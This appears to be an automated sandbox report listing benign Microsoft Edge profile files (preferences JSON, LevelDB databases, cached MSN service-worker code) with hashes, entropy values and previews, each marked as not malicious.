                                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377174552765759","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):9576
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1121421679451435
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:192:st8kdpVCstYyaNP9kHgF8KbV+FyEQAZOP+YJ:st8QYstYtJfbGxQV
                                                                                                                                                                                                                                                                                                                    MD5:49050D6D8B063A91634693D5FD725A4B
                                                                                                                                                                                                                                                                                                                    SHA1:920C9AA0FBF820BAE95F259F0E38F59D6FD24AF1
                                                                                                                                                                                                                                                                                                                    SHA-256:DD1893CF0F6BE219C61C52C8A5B5A3AA836769D3ED0F7790EAF4EB7A58E4C356
                                                                                                                                                                                                                                                                                                                    SHA-512:E1C5EA530111CD62D8857C6162BFF4EDC433E9DA651CA04E357E63D19C609A89956D31600639B4362EE8FCC4425CC7D59AAC43FA581567C4BC0647EAC50ECA84
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377174552765759","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):9576
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1121421679451435
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:192:st8kdpVCstYyaNP9kHgF8KbV+FyEQAZOP+YJ:st8QYstYtJfbGxQV
                                                                                                                                                                                                                                                                                                                    MD5:49050D6D8B063A91634693D5FD725A4B
                                                                                                                                                                                                                                                                                                                    SHA1:920C9AA0FBF820BAE95F259F0E38F59D6FD24AF1
                                                                                                                                                                                                                                                                                                                    SHA-256:DD1893CF0F6BE219C61C52C8A5B5A3AA836769D3ED0F7790EAF4EB7A58E4C356
                                                                                                                                                                                                                                                                                                                    SHA-512:E1C5EA530111CD62D8857C6162BFF4EDC433E9DA651CA04E357E63D19C609A89956D31600639B4362EE8FCC4425CC7D59AAC43FA581567C4BC0647EAC50ECA84
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377174552765759","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):24853
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.565167420840084
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:58ycZ6WP4Sfba8F1+UoAYDCx9Tuqh0VfUC9xbog/OVkZxn3rwxpWtuC:58ycZ6WP4Sfbau1jaZznkutJ
                                                                                                                                                                                                                                                                                                                    MD5:A6105DFFAE1483736B9CEC76D39A79E5
                                                                                                                                                                                                                                                                                                                    SHA1:3636AF870279CE7041E71C9E1E7399E70B76A382
                                                                                                                                                                                                                                                                                                                    SHA-256:435462BAA3FA448E9A0169400BB9795F297285A3E8F11644B0AE31ADF7A25FD5
                                                                                                                                                                                                                                                                                                                    SHA-512:10FC978F99DD665ACA72A048258D2D6345726FD6D0981F68D20D30011904E87EF3067C71FE2A22236265E827B39D290BC4ED8590EE16EC81E5F177179C097911
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377174552143414","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377174552143414","location":5,"ma
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):24853
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.565167420840084
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:58ycZ6WP4Sfba8F1+UoAYDCx9Tuqh0VfUC9xbog/OVkZxn3rwxpWtuC:58ycZ6WP4Sfbau1jaZznkutJ
                                                                                                                                                                                                                                                                                                                    MD5:A6105DFFAE1483736B9CEC76D39A79E5
                                                                                                                                                                                                                                                                                                                    SHA1:3636AF870279CE7041E71C9E1E7399E70B76A382
                                                                                                                                                                                                                                                                                                                    SHA-256:435462BAA3FA448E9A0169400BB9795F297285A3E8F11644B0AE31ADF7A25FD5
                                                                                                                                                                                                                                                                                                                    SHA-512:10FC978F99DD665ACA72A048258D2D6345726FD6D0981F68D20D30011904E87EF3067C71FE2A22236265E827B39D290BC4ED8590EE16EC81E5F177179C097911
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377174552143414","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377174552143414","location":5,"ma
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2294
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.830759978852109
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:F2xc5Nmpcncmo0CRORpllg2DcfRH8VdCRORpllg2Sc03osxQ/KCRORpllg2DfRHb:F2emitrdDcfBCXrdYxQGrdDfBord3oBX
                                                                                                                                                                                                                                                                                                                    MD5:BB4FE70B24B349B9E76C8D6E3481D20D
                                                                                                                                                                                                                                                                                                                    SHA1:CE77FB440503F7D6FA5A8A47A920E8EDEF3EA6C4
                                                                                                                                                                                                                                                                                                                    SHA-256:AA96DF51046AFFEB2456B7F3B7D2F5F67FAA560A80FE8B7FF661D947F9876663
                                                                                                                                                                                                                                                                                                                    SHA-512:268EB4AA88722C627429777DE27AB6DA98FFB346679EC80B15E2C31D252BF68EA6FD6CA0E85B55FA8AC3B8288F54F5B3754E946D250F44EC90F903D464E1FA69
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2..ym................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true .(.0.8.......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enable
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):303
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1665525705736774
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0qb1cNwi23oH+TcwtE/a252KLlVCe0U1yq2PcNwi23oH+TcwtE/a2ZIFUv:flZYeb8xLnf4vLZYeb8J2FUv
                                                                                                                                                                                                                                                                                                                    MD5:98AE5DBF48505FE2411B33FDD677FCC4
                                                                                                                                                                                                                                                                                                                    SHA1:84261DE7FACDFAF9C04EF8910351D1AB5C8E8E1D
                                                                                                                                                                                                                                                                                                                    SHA-256:837A6748490A503CE08EEE5CEE77264D5921596FDFE4D039991DAD28ACDA2258
                                                                                                                                                                                                                                                                                                                    SHA-512:2F4731DA22D7F6731D92554D3EA6AFA8C0D25B2F0300C228C0D53041476AFE518CA56621908428C090E46F96E2D06E1EE4250CC51ACC2DC98414A99DE33CEDD6
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:29.532 150 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/11/27-04:49:29.550 150 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):114376
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.577830713842909
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:AU906yxPXfOxr1lhCe1nL/rmL/rBZXECjAWNKPt3dfvYgv5I:d9LyxPXfOxr1lMe1nL/CL/TXEmsvFW
                                                                                                                                                                                                                                                                                                                    MD5:B80525998F09B822DA718E892D6ACB83
                                                                                                                                                                                                                                                                                                                    SHA1:0B39F3EB1F745AE8B753376308B93226A0F33703
                                                                                                                                                                                                                                                                                                                    SHA-256:E4B97C54396852CE1FF3CC32BE7F46FB0349656D88D918331C4F79D836D72087
                                                                                                                                                                                                                                                                                                                    SHA-512:5F56D7A1806DF31C96E1B15183082A1DC078FA0BE3500C58D44EB4547E84C913A46BA983AA4EF40DC7D3C01CEB219642D234E1B965B81B319A33C5B26CCD5AF4
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):188881
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.386659260900807
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:SYQzlCF4Q5oTSwjdOl8eK3L/c1MwHw8LAmNK8W/qx:SbSwS8emL/oPLLhOq
                                                                                                                                                                                                                                                                                                                    MD5:020869D3A11A27A5D78F515254519F99
                                                                                                                                                                                                                                                                                                                    SHA1:A7EB5AFD6322464CCF7ACB09CD454CB0AD6C8C17
                                                                                                                                                                                                                                                                                                                    SHA-256:34C3BEFF532FF4CA0010A0315EE7A2753C6E1F7DAEF80EEEB7C1E86DB769A3BD
                                                                                                                                                                                                                                                                                                                    SHA-512:2166A6B35C9F84944BD3D6B8CDD635A858B46EB6EFC0C376A9B0A8863D0CED61686A13136480AE55DD920F7EB882D6846584B6BFAF37F1F0AFB7CAE5C36AD1C9
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:0\r..m..........rSG.....0....z3.................;....x.x........,T.8..`,.....L`.....,T...`......L`......Rc.......exports...Rc..6w....module....Rc.u8.....define....Rb.|Z.....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m..R~.b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....zY...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                                    MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                                    SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                                    SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                                    SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:0\r..m..................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.537634645982951
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:hN2uTXl/ly/l9/lxE0tlla/l65z:FmO0g65z
                                                                                                                                                                                                                                                                                                                    MD5:06AE861A88D50A3E7C4A52C09D41FE89
                                                                                                                                                                                                                                                                                                                    SHA1:B2EDB0ED854745FD9468BBB0B571259D58B3BD59
                                                                                                                                                                                                                                                                                                                    SHA-256:5C2DEC6082EBA24DA414A99A7D2A5ABFE665A30B441FBF2346833B0B1DCC3AD9
                                                                                                                                                                                                                                                                                                                    SHA-512:35C29EE688521CDEC33EE806261697FCF2F4EAD32D3E1D7C83EB047A50894FBA4537963B2C6C4802392ACF4D6F829B01ACBA11B9D90A356FF61081783E302AAC
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:@....h..oy retne.........................X....,.................._*x./.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.537634645982951
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:hN2uTXl/ly/l9/lxE0tlla/l65z:FmO0g65z
                                                                                                                                                                                                                                                                                                                    MD5:06AE861A88D50A3E7C4A52C09D41FE89
                                                                                                                                                                                                                                                                                                                    SHA1:B2EDB0ED854745FD9468BBB0B571259D58B3BD59
                                                                                                                                                                                                                                                                                                                    SHA-256:5C2DEC6082EBA24DA414A99A7D2A5ABFE665A30B441FBF2346833B0B1DCC3AD9
                                                                                                                                                                                                                                                                                                                    SHA-512:35C29EE688521CDEC33EE806261697FCF2F4EAD32D3E1D7C83EB047A50894FBA4537963B2C6C4802392ACF4D6F829B01ACBA11B9D90A356FF61081783E302AAC
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:@....h..oy retne.........................X....,.................._*x./.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.537634645982951
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:hN2uTXl/ly/l9/lxE0tlla/l65z:FmO0g65z
                                                                                                                                                                                                                                                                                                                    MD5:06AE861A88D50A3E7C4A52C09D41FE89
                                                                                                                                                                                                                                                                                                                    SHA1:B2EDB0ED854745FD9468BBB0B571259D58B3BD59
                                                                                                                                                                                                                                                                                                                    SHA-256:5C2DEC6082EBA24DA414A99A7D2A5ABFE665A30B441FBF2346833B0B1DCC3AD9
                                                                                                                                                                                                                                                                                                                    SHA-512:35C29EE688521CDEC33EE806261697FCF2F4EAD32D3E1D7C83EB047A50894FBA4537963B2C6C4802392ACF4D6F829B01ACBA11B9D90A356FF61081783E302AAC
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:@....h..oy retne.........................X....,.................._*x./.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):6719
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.3723321053544932
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:96:RW9EBZzn9h6GJEbXHYn9vZA9Xp+cf+o+i7Gst5SLl9iSrpy1x/:R6EHTJEzHYk9Xp+s1+iZ5SLl9iSrYD
                                                                                                                                                                                                                                                                                                                    MD5:609A7C68A9E6A3469BF461F81915DB4F
                                                                                                                                                                                                                                                                                                                    SHA1:B4AFBE14B7FBFCCDD9C57E724180BAF001D91810
                                                                                                                                                                                                                                                                                                                    SHA-256:470171DBA7520810524A40C4F47EEDAE10CCF0288DD2644A71FBB4D4FD7D27A2
                                                                                                                                                                                                                                                                                                                    SHA-512:F23C84BF0FC1F66F78A4207D80A9CF7596874147A91790008CE1F662F4CCA0908AAA5F765E0BEE539B4FF700E16DC15C72CB438C8D25D6D0FB98C74C00BDC13B
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f..................b................next-map-id.1.Cnamespace-bced4e7c_39fd_4016_8add_e6ce4167ea1c-https://ntp.msn.com/.00.3..................map-0-shd_sweeper.1{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.s.e.a.r.c.h.n.e.w.t.,.a.d.s.-.w.w.-.t.2.-.d.b.l.k.-.r.s.r.,.a.d.s.-.s.m.a.r.t.b.l.c.k.-.d.n.k.,.k.w.-.c.b.v.4.-.d.e.f.a.u.l.t.1.,.k.w.-.s.i.-.d.e.f.a.u.l.t.3.,.s.i.d.-.n.e.w.-.c.l.i.d.,.s.i.d.-.w.1.-.a.d.d.g.n.o.i.s.e.,.s.i.d.-.w.2.-.a.d.d.g.n.o.i.s.e.,.s.i.d.-.w.3.-.a.d.d.g.n.o.i.s.e.,.s.i.d.a.m.o.-.w.1.-.u.n.i.-.s.t.a.g.e.-.2.,.s.i.d.a.m.o.-.w.3.-.u.n.i.-.s.t.a.g.e.-.2.,.p.r.g.-.1.s.-.d.w.v.i.d.-.t.1.,.1.s.-.p.1.-.d.w.l.s.,.1.s.-.p.2.-.d.w.l.s.,.p.r.g.-.1.s.w.-.n.o.c.o.o.l.d.o.w.n.,.p.r.g.-.p.r.1.-.v.i.d.e.o.s.,.p.r.g.-.p.r.2.-.v.i.d.e.o.s.,.p.r.g.-.v.i.d.-.d.w.l.s.c.a.c.h.e.,.p.r.g.-.1.s.w.-.m.i.t.o.t.d.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):330
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.155733730188499
                                                                                                                                                                                                                                                                                                                    Encrypted:false
